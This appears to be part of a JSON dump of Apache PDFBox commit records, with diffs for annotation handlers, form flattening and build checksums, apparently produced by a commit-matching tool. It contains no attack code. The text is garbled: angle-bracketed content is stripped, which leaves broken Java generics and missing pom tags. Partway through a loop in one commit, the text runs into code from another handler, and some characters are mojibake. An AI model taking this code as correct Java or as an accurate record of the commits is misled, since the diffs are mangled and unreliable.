{ + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "0be6ddd5256be813dcfeb66c9528f19c19fd9e4c", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527300913, + "hunks": 16, + "message": "PDFBOX-3353: avoid ClassCastException, fix javadoc git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832288 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationSquareCircle.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationSquareCircle.java", + "index 8198bd4fb..077c576d9 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationSquareCircle.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationSquareCircle.java", + "@@ -27,3 +27,4 @@ import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", + " /**", + "- * This is the class that represents a rectangular or elliptical annotation introduced in PDF 1.3 specification .", + "+ * This is the class that represents a rectangular or elliptical annotation introduced in PDF 1.3", + "+ * specification .", + " *", + "@@ -78,3 +79,4 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", + " /**", + "- * This will set the border effect dictionary, specifying effects to be applied when drawing the line.", + "+ * This will set the border effect dictionary, specifying effects to be applied when drawing the", + "+ * line.", + " *", + "@@ -89,3 +91,4 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", + " /**", + "- * This will retrieve the border effect dictionary, specifying effects to be applied used in drawing the line.", + "+ * This will retrieve the border effect dictionary, specifying effects to be applied used in", + "+ * drawing the line.", + " *", + "@@ -95,11 +98,8 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", + " {", + "- COSDictionary be = (COSDictionary) getCOSObject().getDictionaryObject(COSName.BE);", + "- if (be != null)", + "+ COSBase base = getCOSObject().getDictionaryObject(COSName.BE);", + "+ if (base instanceof COSDictionary)", + " {", + "- return new PDBorderEffectDictionary(be);", + "- }", + "- else", + "- {", + "- return null;", + "+ return new PDBorderEffectDictionary((COSDictionary) base);", + " }", + "+ return null;", + " }", + "@@ -107,4 +107,5 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", + " /**", + "- * This will set the rectangle difference rectangle. Giving the difference between the annotations rectangle and", + "- * where the drawing occurs. (To take account of any effects applied through the BE entry forexample)", + "+ * This will set the rectangle difference rectangle. Giving the difference between the", + "+ * annotations rectangle and where the drawing occurs. (To take account of any effects applied", + "+ * through the BE entry for example)", + " *", + "@@ -119,4 +120,5 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", + " /**", + "- * This will get the rectangle difference rectangle. Giving the difference between the annotations rectangle and", + "- * where the drawing occurs. (To take account of any effects applied through the BE entry forexample)", + "+ * This will get the rectangle difference rectangle. Giving the difference between the", + "+ * annotations rectangle and where the drawing occurs. (To take account of any effects applied", + "+ * through the BE entry for example)", + " *", + "@@ -126,11 +128,8 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", + " {", + "- COSArray rd = (COSArray) getCOSObject().getDictionaryObject(COSName.RD);", + "- if (rd != null)", + "- {", + "- return new PDRectangle(rd);", + "- }", + "- else", + "+ COSBase base = getCOSObject().getDictionaryObject(COSName.RD);", + "+ if (base instanceof COSArray)", + " {", + "- return null;", + "+ return new PDRectangle((COSArray) base);", + " }", + "+ return null;", + " }", + "@@ -138,3 +137,4 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", + " /**", + "- * This will set the border style dictionary, specifying the width and dash pattern used in drawing the line.", + "+ * This will set the border style dictionary, specifying the width and dash pattern used in", + "+ * drawing the line.", + " *", + "@@ -150,3 +150,4 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", + " /**", + "- * This will retrieve the border style dictionary, specifying the width and dash pattern used in drawing the line.", + "+ * This will retrieve the border style dictionary, specifying the width and dash pattern used in", + "+ * drawing the line.", + " *", + "@@ -164,12 +165,14 @@ public abstract class PDAnnotationSquareCircle extends PDAnnotationMarkup", + " }", + "- ", + "+", + " /**", + "- * This will set the difference between the annotations \"outer\" rectangle defined by", + "- * /Rect and the border.", + "- * ", + "- *

    This will set an equal difference for all sides

    ", + "- * ", + "+ * This will set the difference between the annotations \"outer\" rectangle defined by /Rect and", + "+ * the border.", + "+ *", + "+ *

    ", + "+ * This will set an equal difference for all sides

    ", + "+ *", + " * @param difference from the annotations /Rect entry", + " */", + "- public void setRectDifferences(float difference) {", + "+ public void setRectDifferences(float difference)", + "+ {", + " setRectDifferences(difference, difference, difference, difference);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationSquareCircle.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "63e6857b4a18d72b2effcc4096c41b550d60c3a0", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528050958, + "hunks": 18, + "message": "PDFBOX-3353: make public git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832781 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", + "index 377adb6ed..b2b981817 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", + "@@ -24,3 +24,3 @@ import org.apache.pdfbox.pdmodel.font.PDFont;", + " */", + "-class AppearanceStyle", + "+public class AppearanceStyle", + " {", + "@@ -56,3 +56,3 @@ class AppearanceStyle", + " */", + "- void setFont(PDFont font)", + "+ public void setFont(PDFont font)", + " {", + "@@ -76,3 +76,3 @@ class AppearanceStyle", + " */", + "- void setFontSize(float fontSize)", + "+ public void setFontSize(float fontSize)", + " {", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", + "index 165c8e455..16261b3e2 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", + "@@ -36,3 +36,3 @@ import org.apache.pdfbox.pdmodel.font.PDFont;", + " */", + "-class PlainText", + "+public class PlainText", + " {", + "@@ -51,3 +51,3 @@ class PlainText", + " */", + "- PlainText(String textValue)", + "+ public PlainText(String textValue)", + " {", + "@@ -74,3 +74,3 @@ class PlainText", + " */", + "- PlainText(List listValue)", + "+ public PlainText(List listValue)", + " {", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", + "index 6458d8404..df9dd603b 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", + "@@ -28,3 +28,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainText.Word;", + " /**", + "- * TextFormatter to handle plain text formatting.", + "+ * TextFormatter to handle plain text formatting for annotation rectangles.", + " * ", + "@@ -34,3 +34,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainText.Word;", + "-class PlainTextFormatter", + "+public class PlainTextFormatter", + " {", + "@@ -82,3 +82,3 @@ class PlainTextFormatter", + "- static class Builder", + "+ public static class Builder", + " {", + "@@ -100,3 +100,3 @@ class PlainTextFormatter", + "- Builder(PDAppearanceContentStream contents)", + "+ public Builder(PDAppearanceContentStream contents)", + " {", + "@@ -105,3 +105,3 @@ class PlainTextFormatter", + "- Builder style(AppearanceStyle appearanceStyle)", + "+ public Builder style(AppearanceStyle appearanceStyle)", + " {", + "@@ -111,3 +111,3 @@ class PlainTextFormatter", + "- Builder wrapLines(boolean wrapLines)", + "+ public Builder wrapLines(boolean wrapLines)", + " {", + "@@ -117,3 +117,3 @@ class PlainTextFormatter", + "- Builder width(float width)", + "+ public Builder width(float width)", + " {", + "@@ -123,3 +123,3 @@ class PlainTextFormatter", + "- Builder textAlign(int alignment)", + "+ public Builder textAlign(int alignment)", + " {", + "@@ -129,3 +129,3 @@ class PlainTextFormatter", + "- Builder textAlign(TextAlign alignment)", + "+ public Builder textAlign(TextAlign alignment)", + " {", + "@@ -136,3 +136,3 @@ class PlainTextFormatter", + "- Builder text(PlainText textContent)", + "+ public Builder text(PlainText textContent)", + " {", + "@@ -142,3 +142,3 @@ class PlainTextFormatter", + "- Builder initialOffset(float horizontalOffset, float verticalOffset)", + "+ public Builder initialOffset(float horizontalOffset, float verticalOffset)", + " {", + "@@ -149,3 +149,3 @@ class PlainTextFormatter", + "- PlainTextFormatter build()", + "+ public PlainTextFormatter build()", + " {" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "399d7ef280239f47f5ee689b4d073b0d0bbccce5", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532463659, + "hunks": 3, + "message": "PDFBOX-4271: use sha512 instead of md5, use newer plugin git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836584 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/preflight/pom.xml b/preflight/pom.xml", + "index fcbebd90d..f38e659e8 100644", + "--- a/preflight/pom.xml", + "+++ b/preflight/pom.xml", + "@@ -109,4 +109,3 @@", + " com.googlecode.maven-download-plugin", + "- ", + "- maven-download-plugin", + "+ download-maven-plugin", + " ", + "@@ -125,3 +124,3 @@", + " ${project.build.directory}/pdfs", + "- 9f129c834bc6f9f8dabad4491c4c10ec", + "+ 66bf4ad470b36079c1e0ceca4438053f32649f964fb1de5cd88babce36c5afc0ba6fa7880bc1c9aac791df872cdfc8dc9851bfd3c75ae96786edd8fac61193ae", + " ", + "@@ -139,3 +138,3 @@", + " ${project.build.directory}/pdfs", + "- d8fccb2fea540ab49bef237f3579546b", + "+ a6efe70574dcde3628271fc1d7aa32cc00095334aa9415e5ebfb96cc20e0f79edd040c0290d5a76b4ced4c6a4343ba4af9567bf12eb7cfe3ec70f1a43202c231", + "
    " + ], + "changed_files": [ + "preflight/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4271": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4271", + "relevance": 2 + } + ] + }, + { + "commit_id": "1f7d51fe972e9cab88cdc052048d613300db2159", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527613647, + "hunks": 1, + "message": "PDFBOX-3353: remove unused import git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832461 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "index 08631c951..68a59bee0 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "@@ -22,3 +22,2 @@ import org.apache.commons.logging.LogFactory;", + " import org.apache.fontbox.util.Charsets;", + "-import org.apache.pdfbox.contentstream.PDFStreamEngine;", + " import org.apache.pdfbox.contentstream.operator.Operator;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "65a3e829469c2433c26f9e272d2eba3897f334e1", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530634529, + "hunks": 4, + "message": "PDFBOX-3353: add handler for squiggly annotation git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835002 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquigglyAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquigglyAppearanceHandler.java", + "index ccabb40b6..7a54d95d2 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquigglyAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquigglyAppearanceHandler.java", + "@@ -18,5 +18,22 @@ package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", + "+import java.awt.geom.AffineTransform;", + "+import java.io.IOException;", + " import org.apache.commons.logging.Log;", + " import org.apache.commons.logging.LogFactory;", + "+import org.apache.pdfbox.cos.COSName;", + "+import org.apache.pdfbox.cos.COSStream;", + "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.PDFormContentStream;", + "+import org.apache.pdfbox.pdmodel.PDPatternContentStream;", + "+import org.apache.pdfbox.pdmodel.PDResources;", + "+import org.apache.pdfbox.pdmodel.common.PDRectangle;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDColorSpace;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceRGB;", + "+import org.apache.pdfbox.pdmodel.graphics.color.PDPattern;", + "+import org.apache.pdfbox.pdmodel.graphics.form.PDFormXObject;", + "+import org.apache.pdfbox.pdmodel.graphics.pattern.PDTilingPattern;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationSquiggly;", + "+import org.apache.pdfbox.util.Matrix;", + "@@ -45,3 +62,107 @@ public class PDSquigglyAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- //TODO", + "+ PDAnnotationSquiggly annotation = (PDAnnotationSquiggly) getAnnotation();", + "+ PDRectangle rect = annotation.getRectangle();", + "+ float[] pathsArray = annotation.getQuadPoints();", + "+ if (pathsArray == null)", + "+ {", + "+ return;", + "+ }", + "+ AnnotationBorder ab = AnnotationBorder.getAnnotationBorder(annotation, annotation.getBorderStyle());", + "+ PDColor color = annotation.getColor();", + "+ if (color == null || color.getComponents().length == 0)", + "+ {", + "+ return;", + "+ }", + "+ if (Float.compare(ab.width, 0) == 0)", + "+ {", + "+ // value found in adobe reader", + "+ ab.width = 1.5f;", + "+ }", + "+", + "+ // Adjust rectangle even if not empty, see PLPDF.com-MarkupAnnotations.pdf", + "+ //TODO in a class structure this should be overridable", + "+ // this is similar to polyline but different data type", + "+ // all coordinates (unlike painting) are used because I'm lazy", + "+ float minX = Float.MAX_VALUE;", + "+ float minY = Float.MAX_VALUE;", + "+ float maxX = Float.MIN_VALUE;", + "+ float maxY = Float.MIN_VALUE;", + "+ for (int i = 0; i < pathsArray.length / 2; ++i)", + "+ {", + "+ float x = pathsArray[i * 2];", + "+ float y = pathsArray[i * 2 + 1];", + "+ minX = Math.min(minX, x);", + "+ minY = Math.min(minY, y);", + "+ maxX = Math.max(maxX, x);", + "+ maxY = Math.max(maxY, y);", + "+ }", + "+ rect.setLowerLeftX(Math.min(minX - ab.width / 2, rect.getLowerLeftX()));", + "+ rect.setLowerLeftY(Math.min(minY - ab.width / 2, rect.getLowerLeftY()));", + "+ rect.setUpperRightX(Math.max(maxX + ab.width / 2, rect.getUpperRightX()));", + "+ rect.setUpperRightY(Math.max(maxY + ab.width / 2, rect.getUpperRightY()));", + "+ annotation.setRectangle(rect);", + "+", + "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + "+ {", + "+ setOpacity(cs, annotation.getConstantOpacity());", + "+", + "+ cs.setStrokingColor(color);", + "+", + "+ //TODO we ignore dash pattern and line width for now. Do they have any effect?", + "+", + "+", + "+ // quadpoints spec is incorrect", + "+ // https://stackoverflow.com/questions/9855814/pdf-spec-vs-acrobat-creation-quadpoints", + "+ for (int i = 0; i < pathsArray.length / 8; ++i)", + "+ {", + "+ // Adobe uses a fixed pattern that assumes a height of 40, and it transforms to that height", + "+ // horizontally and the same / 1.8 vertically.", + "+ // translation apparently based on bottom left, but slightly different in Adobe", + "+ //TODO what if the annotation is not horizontal?", + "+ float height = pathsArray[i * 8 + 1] - pathsArray[i * 8 + 5];", + "+ cs.transform(new Matrix(height / 40f, 0, 0, height / 40f / 1.8f, pathsArray[i * 8 + 4], pathsArray[i * 8 + 5]));", + "+", + "+ // Create form, BBox is mostly fixed, except for the horizontal size which is", + "+ // horizontal size divided by the horizontal transform factor from above", + "+ // (almost)", + "+ PDFormXObject form = new PDFormXObject(new COSStream());", + "+ form.setBBox(new PDRectangle(-0.5f, -0.5f, (pathsArray[i * 8 + 2] - pathsArray[i * 8]) / height * 40f + 0.5f, 13));", + "+ form.setResources(new PDResources());", + "+ form.setMatrix(AffineTransform.getTranslateInstance(0.5f, 0.5f));", + "+ cs.drawForm(form);", + "+ try (PDFormContentStream formCS = new PDFormContentStream(form))", + "+ {", + "+ PDTilingPattern pattern = new PDTilingPattern();", + "+ pattern.setBBox(new PDRectangle(0, 0, 10, 12));", + "+ pattern.setXStep(10);", + "+ pattern.setYStep(13);", + "+ pattern.setTilingType(PDTilingPattern.TILING_CONSTANT_SPACING_FASTER_TILING);", + "+ pattern.setPaintType(PDTilingPattern.PAINT_UNCOLORED);", + "+ try (PDPatternContentStream patternCS = new PDPatternContentStream(pattern))", + "+ {", + "+ // from Adobe", + "+ patternCS.setLineCapStyle(1);", + "+ patternCS.setLineJoinStyle(1);", + "+ patternCS.setLineWidth(1);", + "+ patternCS.setMiterLimit(10);", + "+ patternCS.moveTo(0, 1);", + "+ patternCS.lineTo(5, 11);", + "+ patternCS.lineTo(10, 1);", + "+ patternCS.stroke();", + "+ }", + "+ COSName patternName = form.getResources().add(pattern);", + "+ PDColorSpace patternColorSpace = new PDPattern(null, PDDeviceRGB.INSTANCE);", + "+ PDColor patternColor = new PDColor(color.getComponents(), patternName, patternColorSpace);", + "+ formCS.setNonStrokingColor(patternColor);", + "+", + "+ // With Adobe, the horizontal size is slightly different, don't know why", + "+ formCS.addRect(0, 0, (pathsArray[i * 8 + 2] - pathsArray[i * 8]) / height * 40f, 12);", + "+ formCS.fill();", + "+ }", + "+ }", + "+ }", + "+ catch (IOException ex)", + "+ {", + "+ LOG.error(ex);", + "+ }", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquigglyAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "1d2fd3df5264ea7bc367dacc0c5b8b1435bdb5da", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523724888, + "hunks": 7, + "message": "PDFBOX-3809: flatten only specified fields git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829151 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "index 5af88cba3..de3ba969b 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", + "@@ -253,2 +253,7 @@ public final class PDAcroForm implements COSObjectable", + " {", + "+ // Nothing to flatten if there are no fields provided", + "+ if (fields.isEmpty()) {", + "+ return;", + "+ }", + "+", + " // for dynamic XFA forms there is no flatten as this would mean to do a rendering", + "@@ -273,2 +278,5 @@ public final class PDAcroForm implements COSObjectable", + " PDPageContentStream contentStream;", + "+", + "+ // get the widgets per page", + "+ Map> pagesWidgetsMap = buildPagesWidgetsMap(fields);", + "@@ -277,2 +285,3 @@ public final class PDAcroForm implements COSObjectable", + " {", + "+ Map widgetsForPageMap = pagesWidgetsMap.get(page.getCOSObject());", + " isContentStreamWrapped = false;", + "@@ -283,3 +292,3 @@ public final class PDAcroForm implements COSObjectable", + " {", + "- if (!(annotation instanceof PDAnnotationWidget))", + "+ if (widgetsForPageMap != null && widgetsForPageMap.get(annotation.getCOSObject()) == null)", + " {", + "@@ -352,3 +361,3 @@ public final class PDAcroForm implements COSObjectable", + " // remove the fields", + "- setFields(Collections.emptyList());", + "+ removeFields(fields);", + "@@ -705,21 +714,2 @@ public final class PDAcroForm implements COSObjectable", + "- private Map buildAnnotationToPageRef() {", + "- Map annotationToPageRef = new HashMap();", + "- ", + "- int idx = 0;", + "- for (PDPage page : document.getPages()) {", + "- try {", + "- for (PDAnnotation annotation : page.getAnnotations()) {", + "- if (annotation instanceof PDAnnotationWidget) {", + "- annotationToPageRef.put(annotation.getCOSObject(), idx);", + "- }", + "- }", + "- } catch (IOException e) {", + "- LOG.warn(\"Can't retriev annotations for page \" + idx);", + "- }", + "- idx++;", + "- } ", + "- return annotationToPageRef;", + "- }", + "- ", + " /**", + "@@ -782,2 +772,73 @@ public final class PDAcroForm implements COSObjectable", + " }", + "+", + "+ private Map> buildPagesWidgetsMap(List fields)", + "+ {", + "+ Map> pagesAnnotationsMap = new HashMap>();", + "+ boolean hasMissingPageRef = false;", + "+ ", + "+ for (PDField field : fields)", + "+ {", + "+ List widgets = field.getWidgets();", + "+ for (PDAnnotationWidget widget : widgets)", + "+ {", + "+ PDPage pageForWidget = widget.getPage();", + "+ if (pageForWidget != null)", + "+ {", + "+ if (pagesAnnotationsMap.get(pageForWidget.getCOSObject()) == null)", + "+ {", + "+ Map widgetsForPage = new HashMap();", + "+ widgetsForPage.put(widget.getCOSObject(), widget);", + "+ pagesAnnotationsMap.put(pageForWidget.getCOSObject(), widgetsForPage);", + "+ }", + "+ else", + "+ {", + "+ Map widgetsForPage = pagesAnnotationsMap.get(pageForWidget.getCOSObject());", + "+ widgetsForPage.put(widget.getCOSObject(), widget);", + "+ }", + "+ }", + "+ else", + "+ {", + "+ hasMissingPageRef = true;", + "+ }", + "+ }", + "+ }", + "+ ", + "+ // TODO: if there is a widget with a missing page reference ", + "+ // we'd need to build the map reverse i.e. form the annotations to the ", + "+ // widget. But this will be much slower so will be omitted for now.", + "+ if (hasMissingPageRef)", + "+ {", + "+ LOG.warn(\"There has been a widget with a missing page reference. Please report to the PDFBox project\");", + "+ }", + "+ ", + "+ return pagesAnnotationsMap;", + "+ }", + "+ ", + "+ private void removeFields(List fields)", + "+ {", + "+ for (PDField field : fields) {", + "+ if (field.getParent() == null)", + "+ {", + "+ COSArray cosFields = (COSArray) dictionary.getDictionaryObject(COSName.FIELDS);", + "+ for (int i=0; i 0)", + "+ {", + "+ // Adjust rectangle even if not empty", + "+ // CTAN-example-Annotations.pdf p1", + "+ //TODO in a class structure this should be overridable", + "+ float minX = Float.MAX_VALUE;", + "+ float minY = Float.MAX_VALUE;", + "+ float maxX = Float.MIN_VALUE;", + "+ float maxY = Float.MIN_VALUE;", + "+ for (int i = 0; i < pathsArray.length / 2; ++i)", + "+ {", + "+ float x = pathsArray[i * 2];", + "+ float y = pathsArray[i * 2 + 1];", + "+ minX = Math.min(minX, x);", + "+ minY = Math.min(minY, y);", + "+ maxX = Math.max(maxX, x);", + "+ maxY = Math.max(maxY, y);", + "+ }", + "+ // arrow length is 9 * width at about 30\u00c3\u0082\u00c2\u00b0 => 10 * width seems to be enough", + "+ rect.setLowerLeftX(Math.min(minX - ab.width * 10, rect.getLowerLeftX()));", + "+ rect.setLowerLeftY(Math.min(minY - ab.width * 10, rect.getLowerLeftY()));", + "+ rect.setUpperRightX(Math.max(maxX + ab.width * 10, rect.getUpperRightX()));", + "+ rect.setUpperRightY(Math.max(maxY + ab.width * 10, rect.getUpperRightY()));", + "+ annotation.setRectangle(rect);", + "+ }", + "+", + "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + "+ {", + "+ // The fill color is the /C entry, there is no /IC entry defined", + "+ boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getColor());", + "+ setOpacity(cs, annotation.getConstantOpacity());", + "+", + "+ // in reality, Adobe uses the non stroking color from /DA as stroking color. WTF?", + "+ boolean hasStroke = cs.setStrokingColorOnDemand(color);", + "+ if (ab.dashArray != null)", + "+ {", + "+ cs.setLineDashPattern(ab.dashArray, 0);", + "+ }", + "+ cs.setLineWidth(ab.width);", + "+", + "+ for (int i = 0; i < pathsArray.length / 2; ++i)", + "+ {", + "+ float x = pathsArray[i * 2];", + "+ float y = pathsArray[i * 2 + 1];", + "+ if (i == 0)", + "+ {", + "+ if (SHORT_STYLES.contains(annotation.getLineEndingStyle()))", + "+ {", + "+ // modify coordinate to shorten the segment", + "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + "+ float x1 = pathsArray[2];", + "+ float y1 = pathsArray[3];", + "+ float len = (float) (Math.sqrt(Math.pow(x - x1, 2) + Math.pow(y - y1, 2)));", + "+ if (Float.compare(len, 0) != 0)", + "+ {", + "+ x += (x1 - x) / len * ab.width;", + "+ y += (y1 - y) / len * ab.width;", + "+ }", + "+ }", + "+ cs.moveTo(x, y);", + "+ }", + "+ else", + "+ {", + "+ cs.lineTo(x, y);", + "+ }", + "+ }", + "+ cs.stroke();", + "+", + "+ // do a transform so that first \"arm\" is imagined flat, like in line handler", + "+ // the alternative would be to apply the transform to the LE shapes directly,", + "+ // which would be more work and produce code difficult to understand", + "+ // paint the styles here and after line(s) draw, to avoid line crossing a filled 